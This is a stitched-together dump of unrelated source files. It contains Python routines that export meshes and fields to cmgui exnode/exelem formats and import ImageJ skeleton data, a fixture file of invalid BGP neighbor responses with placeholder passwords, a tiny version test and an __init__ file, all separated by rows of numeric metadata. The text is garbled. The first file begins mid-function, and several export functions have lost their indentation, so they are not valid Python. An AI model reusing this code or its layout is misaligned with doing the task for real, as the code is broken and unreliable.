# Exports a nodal radius field to exnode or exdata format, averaging per-element data onto nodes
# data = array of per-element values (e.g. radii)
# groupname = what you want your data to be called in cmgui
# fieldname = name of the field as it will appear in cmgui
# filename = file name without extension
# type = exnode or exdata
# nodes = array of node coordinates; elems = element connectivity rows [element, node1, node2]
data_num = len(data)
filename = filename + '.' + type
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" #Fields=1\n")
f.write(" 1) %s, coordinate, rectangular cartesian, #Components=1\n" % fieldname)
f.write(" %s. Value index=1, #Derivatives=0\n" % fieldname)
num_per_node = np.zeros(len(nodes))
node_rad = np.zeros(len(nodes))
# Accumulate each element's value onto its two end nodes, counting contributions per node
for x in range(0, data_num):
    np1 = elems[x][1]
    np2 = elems[x][2]
    num_per_node[np1] = num_per_node[np1] + 1.
    num_per_node[np2] = num_per_node[np2] + 1.
    node_rad[np1] = node_rad[np1] + data[x]
    node_rad[np2] = node_rad[np2] + data[x]
# Average the accumulated values and write one field value per node
for y in range(0, len(nodes)):
    node_rad[y] = node_rad[y] / num_per_node[y]
    f.write("Node: %s\n" % (y + 1))
    f.write(" %s\n" % node_rad[y])
f.close()
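# The function above averages per-element values onto nodes: each node's field value is
# the mean over all elements touching it. E.g. with elems = [[0, 0, 1], [1, 1, 2]] and
# data = [2.0, 4.0], node 1 belongs to both elements, so node_rad[1] = (2.0 + 4.0) / 2 = 3.0.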
def export_exelem_1d(data, groupname, filename):
# Exports element locations to exelem format
# data = array of element connectivity rows [element, node1, node2]
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(data)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=1\n")
f.write(" #Scale factor sets= 1\n")
f.write(" l.Lagrange, #Scale factors= 2\n")
f.write(" #Nodes= 2\n")
f.write(" #Fields=1\n")
f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
f.write(" x. l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 2\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 1\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 2\n")
f.write(" y. l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 2\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 1\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 2\n")
f.write(" z. l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 2\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 1\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 2\n")
for x in range(0, data_num):
f.write(" Element: %s 0 0\n" % int(data[x][0] + 1))
f.write(" Nodes:\n")
f.write(" %s %s\n" % (int(data[x][1] + 1), int(data[x][2] + 1)))
f.write(" Scale factors:\n")
f.write(" 0.1000000000000000E+01 0.1000000000000000E+01\n")
f.close()
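# Usage sketch (hypothetical connectivity): each row of `data` is
# [element_number, node1, node2], zero-indexed (the writer adds 1 for cmgui).
#
#     elems = np.array([[0, 0, 1], [1, 1, 2]])
#     export_exelem_1d(elems, 'tree', 'tree')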
def export_exelem_3d_linear(data, groupname, filename):
# Exports element locations to exelem format
# data = array of element connectivity rows [element, node1, ..., node8]
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(data)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=3 line*line*line\n")
f.write(" #Scale factor sets= 0\n")
f.write(" #Nodes= 8\n")
f.write(" #Fields=1\n")
f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
f.write(" x. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 8\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" y. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 8\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" z. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 8\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
for x in range(0, data_num):
f.write(" Element: %s 0 0\n" % int(data[x][0] + 1))
f.write(" Nodes:")
f.write(
" %s %s %s %s %s %s %s %s\n" % (
int(data[x][1] + 1), int(data[x][2] + 1), int(data[x][3] + 1), int(data[x][4] + 1), int(data[x][5] + 1),
int(data[x][6] + 1), int(data[x][7] + 1), int(data[x][8] + 1)))
f.close()
def export_exelem_3d_linear_list(data, elem_list, groupname, filename):
    # Exports element locations to exelem format for a selected list of elements
    # data = array of data
    # elem_list = indices into data of the elements to export (renamed from
    #             "list", which shadowed the Python built-in)
    # groupname = what you want your data to be called in cmgui
    # filename = file name without extension
    data_num = len(elem_list)
    filename = filename + '.exelem'
    f = open(filename, 'w')
    f.write(" Group name: %s\n" % groupname)
    f.write(" Shape. Dimension=3 line*line*line\n")
    f.write(" #Scale factor sets= 0\n")
    f.write(" #Nodes= 8\n")
    f.write(" #Fields=1\n")
    f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
    # identical x/y/z component blocks, written with nested loops
    for component in ('x', 'y', 'z'):
        f.write(" %s. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n" % component)
        f.write(" #Nodes= 8\n")
        for node in range(1, 9):
            f.write(" %s. #Values=1\n" % node)
            f.write(" Value indices: 1\n")
            f.write(" Scale factor indices: 0\n")
    for x in range(0, data_num):
        y = elem_list[x]
        # Use the listed element's own number; the original wrote data[x][0]
        # here, which mislabelled elements whenever elem_list was not simply
        # 0..N-1, even though the node indices were taken from data[y].
        f.write(" Element: %s 0 0\n" % int(data[y][0] + 1))
        f.write(" Nodes:")
        f.write(" %s %s %s %s %s %s %s %s\n" % tuple(int(data[y][n] + 1) for n in range(1, 9)))
    f.close()
def export_exfield_3d_linear(data, groupname, fieldname, filename):
    # Exports element fields to exelem format
    # data = array of data
    # groupname = what you want your data to be called in cmgui
    # filename = file name without extension
    data_num = len(data)
    filename = filename + '.exelem'
    f = open(filename, 'w')
    f.write(" Group name: %s\n" % groupname)
    f.write(" Shape. Dimension=3 line*line*line\n")
    f.write(" #Scale factor sets= 0\n")
    f.write(" #Nodes= 0\n")
    f.write(" #Fields=1\n")
    f.write(" 1) %s, field, rectangular cartesian, #Components=1\n" % fieldname)
    f.write(" %s. l.Lagrange*l.Lagrange*l.Lagrange, no modify, grid based.\n" % fieldname)
    f.write(" #xi1=1 \n")
    f.write(" #xi2=1 \n")
    f.write(" #xi3=1 \n")
    for x in range(0, data_num):
        f.write(" Element: %s 0 0\n" % int(x + 1))
        f.write(" Values:\n")
        # the element-constant value is repeated at all 2x2x2 = 8 grid points
        f.write(" %s %s %s %s %s %s %s %s\n" % ((data[x],) * 8))
    f.close()
def export_exfield_3d_linear_list(data, elem_list, groupname, fieldname, filename):
    # Exports element fields to exelem format when data is defined at a
    # specified list of elements
    # data = array of data
    # elem_list = indices into data of the elements to export (renamed from
    #             "list", which shadowed the Python built-in)
    # groupname = what you want your data to be called in cmgui
    # filename = file name without extension
    data_num = len(elem_list)
    filename = filename + '.exelem'
    f = open(filename, 'w')
    f.write(" Group name: %s\n" % groupname)
    f.write(" Shape. Dimension=3 line*line*line\n")
    f.write(" #Scale factor sets= 0\n")
    f.write(" #Nodes= 0\n")
    f.write(" #Fields=1\n")
    f.write(" 1) %s, field, rectangular cartesian, #Components=1\n" % fieldname)
    f.write(" %s. l.Lagrange*l.Lagrange*l.Lagrange, no modify, grid based.\n" % fieldname)
    f.write(" #xi1=1 \n")
    f.write(" #xi2=1 \n")
    f.write(" #xi3=1 \n")
    for x in range(0, data_num):
        exp_data = data[elem_list[x]]
        f.write(" Element: %s 0 0\n" % int(x + 1))
        f.write(" Values:\n")
        f.write(" %s %s %s %s %s %s %s %s\n" % ((exp_data,) * 8))
    f.close()
def export_exfield_1d_linear(data, groupname, fieldname, filename):
    # Exports element fields to exelem format (the original comment said
    # "element locations", but this writes a per-element field)
    # data = array of data
    # groupname = what you want your data to be called in cmgui
    # filename = file name without extension
    data_num = len(data)
    filename = filename + '.exelem'
    f = open(filename, 'w')
    f.write(" Group name: %s\n" % groupname)
    f.write(" Shape. Dimension=1\n")
    f.write(" #Scale factor sets= 0\n")
    f.write(" #Nodes= 0\n")
    f.write(" #Fields=1\n")
    f.write(" 1) %s, field, rectangular cartesian, #Components=1\n" % fieldname)
    f.write(" %s. l.Lagrange, no modify, grid based.\n" % fieldname)
    f.write(" #xi1=1 \n")
    for x in range(0, data_num):
        f.write(" Element: %s 0 0\n" % int(x + 1))
        f.write(" Values:\n")
        f.write(" %s %s\n" % (data[x], data[x]))
    f.close()
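######
# Minimal usage sketch (not part of the original module, added for
# illustration): writes one cube element and a matching element-constant
# field. The arrays and the 'porosity' field name are made up; node
# coordinates would be exported separately to an .exnode file.
######
def _example_export_usage():
    # one 3D element: [element number, then its eight node indices]
    elems = np.array([[0, 0, 1, 2, 3, 4, 5, 6, 7]])
    export_exelem_3d_linear(elems, 'mesh', 'mesh')  # writes mesh.exelem
    export_exfield_3d_linear([0.5], 'mesh', 'porosity', 'porosity')  # writes porosity.exelem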
######
# Function: takes data from the csv and converts it to arrays
# Inputs: data_file - generated from the pandas read_csv function, containing results from imageJ image analysis
#         keep_skeleton - skeleton ID (or upper bound on IDs) to keep; ignored when what_skel is "all"
#         what_skel - "less", "single" or "all", controlling which skeletons are kept
# Outputs: nodes - an M x 3 array giving cartesian coordinates (x,y,z) for the node locations in the tree
#          elems - an N x 3 array; the first column is the element number, the second two columns are the indices of the start and end nodes
#          radii, length, euclidean_length - these are all N x 1 arrays containing a property for each element
######
def import_imagej_skel_csv(data_file, keep_skeleton, what_skel):
    # Keep all the elements in the skeleton when what_skel is "all";
    # otherwise select skeletons by SkeletonID
    if what_skel == "less":  # implies we want <= value
        data_file = data_file[data_file.SkeletonID <= keep_skeleton]
    elif what_skel == "single":
        data_file = data_file[data_file.SkeletonID == keep_skeleton]
    elif what_skel == "all":
        print("reading all skeletons: could take a while")
    else:
        print("Not a valid option for reading skeletons")
        return
    # get skeleton properties as arrays
    euclid_length = data_file.Euclideandistance.values
    length = data_file.Branchlength.values
    radii = data_file.averageintensityinner3rd.values
    branch_id = data_file.SkeletonID.values
    print("sorting data")
    # get elem and node data
    data_file = data_file.drop(['SkeletonID', 'Branchlength', 'averageintensityinner3rd', 'Euclideandistance'], axis=1)
    data_file = data_file.values
    (elems, nodes) = pg_utilities.sort_elements(data_file[:, 0:3], data_file[:, 3:6])
    print("elements sorted")
    # get rid of dud elements
    (elems, [length, euclid_length, radii, branch_id]) = pg_utilities.remove_rows(
        elems, [length, euclid_length, radii, branch_id])
    return {'nodes': nodes, 'elems': elems, 'radii': radii, 'length': length,
            'euclidean length': euclid_length, 'branch_id': branch_id}
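######
# Usage sketch (not part of the original module, added for illustration):
# feeding an ImageJ/Fiji "Analyze Skeleton" branch-information CSV into the
# importer above. The file name is hypothetical; the column names
# (SkeletonID, Branchlength, ...) are the ones the importer itself expects.
######
def _example_import_skeleton():
    import pandas as pd  # the importer expects a pandas DataFrame
    data_file = pd.read_csv('branch_info.csv')
    geom = import_imagej_skel_csv(data_file, 1, 'single')  # keep skeleton 1 only
    print(geom['nodes'].shape, geom['elems'].shape)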
def import_stemxy(stem_file):
    # reading in the stem vessel to map the spiral artery location
    stem_xy = open(stem_file, 'r')
    stem_coor = stem_xy.readlines()  # read all lines
    startLines = range(0, len(stem_coor))
    for i in range(len(stem_coor)):
        stem_coor[i] = stem_coor[i].split()
    stem_xyList = []
    stem_elemList = []
    for i in startLines:
        node = []
        node.append(float(stem_coor[i][0]))  # x coor of stem villi
        node.append(float(stem_coor[i][1]))  # y coor of stem villi
        stem_xyList.append(node)
        elem = int(stem_coor[i][2]) - 1
        stem_elemList.append(elem)
    stem_xy.close()
    return {'stem_xy': stem_xyList, 'elem': stem_elemList}
def import_exnode_tree(filename):
    # count nodes for check of correct number for the user, plus use in future arrays
    count_node = 0
    count_attribute = 0
    # Initialise array of node numbers and values
    node_array = np.empty((0, 7))
    # open file
    with open(filename) as f:
        # loop through lines of file
        while True:
            line = f.readline()
            if not line:
                break  # exit if done with all lines
            if not str.split(line):
                continue  # defensive: skip blank lines, which would otherwise crash below
            # identifying whether there is a node defined here
            line_type = str.split(line)[0]
            if line_type == 'Node:':  # line defines a new node
                count_node = count_node + 1  # count the node
                count_attribute = 0  # initialise attributes of the node (coordinates, radius)
                node_array = np.append(node_array, np.zeros((1, 7)),
                                       axis=0)  # initialise a list of attributes for each node
                node_array[count_node - 1][count_attribute] = int(str.split(line)[1]) - 1
            else:
                line_num = is_float(line_type)  # checking if the line is a number
                if line_num:  # it is a number
                    if "index" not in line:
                        count_attribute = count_attribute + 1
                        node_array[count_node - 1][count_attribute] = float(str.split(line)[0])
    # trim the unused attribute columns once the whole file has been read
    if count_attribute < 7:
        node_array = np.delete(node_array, np.s_[count_attribute + 1:7], axis=1)
    total_nodes = count_node
    return {'total_nodes': total_nodes, 'nodes': node_array}
def import_exelem_tree(filename):
    # count elements for check of correct number for the user, plus use in future arrays
    count_el = 0
    # Initialise array of element numbers and values
    el_array = np.empty((0, 3), dtype=int)
    # open file
    with open(filename) as f:
        # loop through lines of file
        while True:
            line = f.readline()
            if not line:
                break  # exit if done with all lines
            if not str.split(line):
                continue  # defensive: skip blank lines, which would otherwise crash below
            # identifying whether there is an element defined here
            line_type = str.split(line)[0]
            if line_type == 'Element:':  # line defines a new element
                count_el = count_el + 1  # count the element
                count_attribute = 0  # initialise attributes of the element (1st node, 2nd node)
                el_array = np.append(el_array, np.zeros((1, 3), dtype=int), axis=0)
                el_array[count_el - 1][count_attribute] = int(str.split(line)[1]) - 1
            else:
                line_num = is_float(line_type)  # checking if the line is a number
                if line_num:  # it is a number
                    if "#Values" not in line and "l.Lagrange" not in line and "1.000000000000000e+00" not in line and "0.1000000000000000E+01" not in line:
                        count_attribute = count_attribute + 1
                        el_array[count_el - 1][count_attribute] = int(float(str.split(line)[0])) - 1  # first node of element
                        el_array[count_el - 1][count_attribute + 1] = int(float(str.split(line)[1])) - 1  # 2nd node of element
    total_el = count_el
    return {'total_elems': total_el, 'elems': el_array}
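######
# Round-trip sketch (not part of the original module, added for
# illustration): .exnode/.exelem files written by the exporters above can be
# read back with these importers. The file names are hypothetical.
######
def _example_reimport():
    nodes = import_exnode_tree('tree.exnode')  # {'total_nodes': ..., 'nodes': ...}
    elems = import_exelem_tree('tree.exelem')  # {'total_elems': ..., 'elems': ...}
    print(nodes['total_nodes'], elems['total_elems'])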
def is_float(s):
    # returns True if s parses as a float (parameter renamed from "str",
    # which shadowed the built-in type)
    try:
        float(s)
    except ValueError:
        return False
    return True
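# Examples: is_float('3.14') -> True, is_float('Node:') -> False. Note that
# float() also accepts 'nan' and 'inf', so is_float('nan') returns True.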
def export_exelem_3d_quadratic(data, groupname, filename):
    # Exports element locations to exelem format
    # data = array of data
    # groupname = what you want your data to be called in cmgui
    # filename = file name without extension
    data_num = len(data)
    filename = filename + '.exelem'
    f = open(filename, 'w')
    f.write(" Group name: %s\n" % groupname)
    f.write(" Shape. Dimension=3\n")
    f.write(" #Scale factor sets= 1\n")
    f.write(" q.Lagrange*q.Lagrange*q.Lagrange, #Scale factors=27\n")
    f.write(" #Nodes= 27\n")
    f.write(" #Fields=1\n")
    f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
    # The x, y and z component blocks are identical, as are the 27 per-node
    # entries within each block, so write them with nested loops rather than
    # 240-odd literal lines.
    for component in ('x', 'y', 'z'):
        f.write(" %s. q.Lagrange*q.Lagrange*q.Lagrange, no modify, standard node based.\n" % component)
        f.write(" #Nodes= 27\n")
        for node in range(1, 28):
            f.write(" %s. #Values=1\n" % node)
            f.write(" Value indices: 1\n")
            f.write(" Scale factor indices: 0\n")
    for x in range(0, data_num):
        f.write(" Element: %s 0 0\n" % int(data[x][0] + 1))
        f.write(" Nodes:")
        f.write((" %s" * 27 + " \n") % tuple(int(data[x][n] + 1) for n in range(1, 28)))
        f.write("Scale factors:\n")
        f.write(("1.0000000000000000E+00 " * 26) + "1.0000000000000000E+00\n")
    f.close()
def export_exfield_3d_quadratic(data, groupname, fieldname, filename):
    # Exports element fields to exelem format
    # data = array of data
    # groupname = what you want your data to be called in cmgui
    # filename = file name without extension
    data_num = len(data)
    filename = filename + '.exelem'
    f = open(filename, 'w')
    f.write(" Group name: %s\n" % groupname)
    f.write(" Shape. Dimension=3 line*line*line\n")
    f.write(" #Scale factor sets= 0\n")
    f.write(" #Nodes= 0\n")
    f.write(" #Fields=1\n")
    f.write(" 1) %s, field, rectangular cartesian, #Components=1\n" % fieldname)
    f.write(" %s. l.Lagrange*l.Lagrange*l.Lagrange, no modify, grid based.\n" % fieldname)
    # 27 values per element correspond to a 3x3x3 grid, i.e. two intervals per
    # xi direction. The original header declared #xi1=1 (a 2x2x2 grid of 8
    # values), which does not match the 27 values written below.
    f.write(" #xi1=2 \n")
    f.write(" #xi2=2 \n")
    f.write(" #xi3=2 \n")
    for x in range(0, data_num):
        f.write(" Element: %s 0 0\n" % int(x + 1))
        f.write(" Values:\n")
        # the element-constant value is repeated at all 27 grid points
        f.write((" %s" * 27 + "\n") % ((data[x],) * 27))
    f.close()
######
# Function: Loads in a stack of images, located in path, and with naming convention name (goes slice at a time to avoid memory errors)
# Inputs: numImages - integer, number of images in the stack
#         name - format string for the image names. Note images must be numbered from 0
# Outputs: Image, a 3D BOOLEAN array containing the image stack
######
def load_image_bool(name, numImages):
    # read in first image + get dimensions to initialise array
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        print(name.format(0))
        im = io.imread(name.format(0))
        gray_image = skimage.color.rgb2gray(im)
    Image = np.zeros([im.shape[0], im.shape[1], numImages], dtype=bool)
    # img_as_bool returns a new array rather than converting in place; the
    # original code discarded its result, so pixels were implicitly cast to
    # bool (nonzero -> True) instead of being thresholded as intended.
    Image[:, :, 0] = skimage.img_as_bool(gray_image)
    # load the remaining slices (slice 0 is already stored above)
    for i in range(1, numImages):
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            im = io.imread(name.format(i))
            gray_image = skimage.color.rgb2gray(im)
        Image[:, :, i] = skimage.img_as_bool(gray_image)
    print('Image ' + name + ' loaded. Shape: ' + str(Image.shape))
    return Image
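######
# Usage sketch (not part of the original module, added for illustration):
# the name argument is a str.format template indexed by slice number, so a
# hypothetical call might look like
#     stack = load_image_bool('segmented/slice{}.png', 100)
# giving a bool array of shape (rows, cols, 100).
######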
| 44.816393
| 689
| 0.519936
| 5,898
| 41,007
| 3.575958
| 0.056629
| 0.155611
| 0.159973
| 0.111517
| 0.813522
| 0.807122
| 0.794747
| 0.766204
| 0.756105
| 0.751363
| 0
| 0.055748
| 0.325042
| 41,007
| 915
| 690
| 44.816393
| 0.706265
| 0.10286
| 0
| 0.79845
| 0
| 0.01938
| 0.473723
| 0.031036
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021964
| false
| 0
| 0.011628
| 0
| 0.043928
| 0.009044
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d49a72bf61bc74a66cb37769866a778598af822d
| 5,558
|
py
|
Python
|
routers/frr/tests/data/__init__.py
|
packethost/network-helpers
|
dea147cf87d199a7b948f65d89612cb29253474c
|
[
"Apache-2.0"
] | 12
|
2020-05-15T00:11:44.000Z
|
2022-02-23T21:24:51.000Z
|
routers/frr/tests/data/__init__.py
|
packethost/network-helpers
|
dea147cf87d199a7b948f65d89612cb29253474c
|
[
"Apache-2.0"
] | null | null | null |
routers/frr/tests/data/__init__.py
|
packethost/network-helpers
|
dea147cf87d199a7b948f65d89612cb29253474c
|
[
"Apache-2.0"
] | 3
|
2021-04-19T14:28:51.000Z
|
2022-02-23T21:24:52.000Z
|
from typing import Any, List

INVALID_RESPONSES: List[Any] = [
    "<html>404 Error</html>",
    {"errors": ["Not found"]},
    {
        "bgp_neighbors": [
            {
                "md5_enabled": True,
                "md5_password": "ValidPassword123",
                "multihop": True,
                "peer_as": 65530,
                "peer_ips": [
                    "fc00:0000:0000:0000:0000:0000:0000:000e",
                    "fc00:0000:0000:0000:0000:0000:0000:000f",
                ],
                "routes_in": [
                    {"exact": False, "route": "2604:1380:1:7400::/56"},
                    {"exact": False, "route": "2604:1380:4111:2300::/56"},
                ],
                "routes_out": [],
            }
        ]
    },
    {
        "bgp_neighbors": [
            {
                "address_family": 4,
                "customer_as": 65000,
                "customer_ip": "10.99.182.129",
                "md5_enabled": True,
                "md5_password": "ValidPassword123",
                "multihop": False,
                "peer_as": 65530,
                "peer_ips": [],
                "routes_in": [
                    {"exact": False, "route": "10.1.0.0/31"},
                    {"exact": False, "route": "10.2.0.0/29"},
                ],
                "routes_out": [],
            },
            {
                "address_family": 6,
                "customer_as": 65000,
                "customer_ip": "2604:1380:4111:2300::1",
                "md5_enabled": True,
                "md5_password": "ValidPassword123",
                "multihop": False,
                "peer_as": 65530,
                "peer_ips": [],
                "routes_in": [
                    {"exact": False, "route": "2604:1380:1:7400::/56"},
                    {"exact": False, "route": "2604:1380:4111:2300::/56"},
                ],
                "routes_out": [],
            },
        ]
    },
    {
        "bgp_neighbors": [
            {
                "address_family": 4,
                "customer_as": 65000,
                "customer_ip": "10.99.182.129",
                "md5_enabled": True,
                "md5_password": "ValidPassword123",
                "multihop": True,
                "peer_as": 65530,
                "peer_ips": ["169.254.255.1", "169.254.255.2"],
                "routes_in": [
                    {"exact": False, "route": "10.1.0.0/31"},
                    {"exact": False, "route": "10.2.0.0/29"},
                ],
                "routes_out": [],
            },
            {
                "address_family": 6,
                "customer_as": 65000,
                "customer_ip": "2604:1380:4111:2300::1",
                "md5_enabled": True,
                "md5_password": "ValidPassword123",
                "multihop": True,
                "peer_as": 65530,
                "peer_ips": [
                    "fc00:0000:0000:0000:0000:0000:0000:000e",
                    "fc00:0000:0000:0000:0000:0000:0000:000f",
                ],
                "routes_in": [
                    {"exact": False, "route": "2604:1380:1:7400::/56"},
                    {"exact": False, "route": "2604:1380:4111:2300::/56"},
                ],
                "routes_out": [],
            },
        ],
        "network": {
            "addresses": [
                {
                    "address": "147.75.65.31",
                    "address_family": 4,
                    "cidr": 31,
                    "customdata": {},
                    "enabled": True,
                    "gateway": "147.75.65.30",
                    "global_ip": None,
                    "manageable": True,
                    "management": False,
                    "netmask": "255.255.255.254",
                    "network": "147.75.65.30",
                    "public": True,
                },
                {
                    "address": "2604:1380:1:5f00::1",
                    "address_family": 6,
                    "cidr": 127,
                    "customdata": {},
                    "enabled": True,
                    "gateway": "2604:1380:1:5f00::",
                    "global_ip": None,
                    "manageable": True,
                    "management": False,
                    "netmask": "ffff:ffff:ffff:ffff:ffff:ffff:ffff:fffe",
                    "network": "2604:1380:1:5f00::",
                    "public": True,
                },
                {
                    "address": "10.99.182.129",
                    "address_family": 4,
                    "cidr": 31,
                    "customdata": {},
                    "enabled": True,
                    "gateway": "10.99.182.128",
                    "global_ip": None,
                    "manageable": True,
                    "management": False,
                    "netmask": "255.255.255.254",
                    "network": "10.99.182.128",
                    "public": False,
                },
                {
                    "address": "10.99.182.254",
                    "address_family": 4,
                    "cidr": 32,
                    "customdata": {},
                    "enabled": True,
                    "gateway": "10.99.182.254",
                    "global_ip": None,
                    "manageable": True,
                    "management": False,
                    "netmask": "255.255.255.255",
                    "network": "10.99.182.254",
                    "public": False,
                },
            ]
        },
    },
]
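# Usage sketch (not part of the original fixtures module, added for
# illustration): a test in the same suite could iterate over these fixtures
# with a hypothetical validator, e.g.
#
#     import pytest
#     from routers.frr.validation import validate_response  # hypothetical import
#
#     @pytest.mark.parametrize("response", INVALID_RESPONSES)
#     def test_rejects_invalid(response):
#         assert not validate_response(response)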
| 35.401274
| 74
| 0.348507
| 432
| 5,558
| 4.358796
| 0.1875
| 0.084971
| 0.101965
| 0.101965
| 0.789166
| 0.789166
| 0.774296
| 0.751992
| 0.7265
| 0.675518
| 0
| 0.203299
| 0.498201
| 5,558
| 156
| 75
| 35.628205
| 0.471854
| 0
| 0
| 0.664516
| 0
| 0
| 0.326916
| 0.06729
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.032258
| 0.006452
| 0
| 0.006452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d49a859688a297a94196731945707633c98a8f30
| 134
|
py
|
Python
|
tests/test_phsic.py
|
meshidenn/phsic
|
0f89ebf27c6501f0bb9d4e11688e57823ebb7359
|
[
"BSD-3-Clause"
] | 9
|
2018-11-03T11:17:59.000Z
|
2022-02-17T03:18:31.000Z
|
tests/test_phsic.py
|
meshidenn/phsic
|
0f89ebf27c6501f0bb9d4e11688e57823ebb7359
|
[
"BSD-3-Clause"
] | 6
|
2020-01-16T06:35:26.000Z
|
2020-01-17T02:20:24.000Z
|
tests/test_phsic.py
|
meshidenn/phsic
|
0f89ebf27c6501f0bb9d4e11688e57823ebb7359
|
[
"BSD-3-Clause"
] | 3
|
2019-11-11T20:06:17.000Z
|
2020-04-10T14:56:33.000Z
|
from phsic import __version__
from phsic import app
def test_version():
    assert __version__ == '0.1.0'
def test_app():
    app
| 12.181818
| 33
| 0.69403
| 20
| 134
| 4.15
| 0.5
| 0.216867
| 0.361446
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.216418
| 134
| 10
| 34
| 13.4
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 0.037313
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d4b6ea8ec8dbac46257c2af21475e8ab8db14040
| 87
|
py
|
Python
|
pointCollection/glah12/__init__.py
|
tsutterley/pointCollection
|
04e4359e463ff8a556e0d078373578bd96390151
|
[
"MIT"
] | null | null | null |
pointCollection/glah12/__init__.py
|
tsutterley/pointCollection
|
04e4359e463ff8a556e0d078373578bd96390151
|
[
"MIT"
] | null | null | null |
pointCollection/glah12/__init__.py
|
tsutterley/pointCollection
|
04e4359e463ff8a556e0d078373578bd96390151
|
[
"MIT"
] | null | null | null |
from .data import data
from .campaign_bias_correction import campaign_bias_correction
| 21.75
| 62
| 0.873563
| 12
| 87
| 6
| 0.5
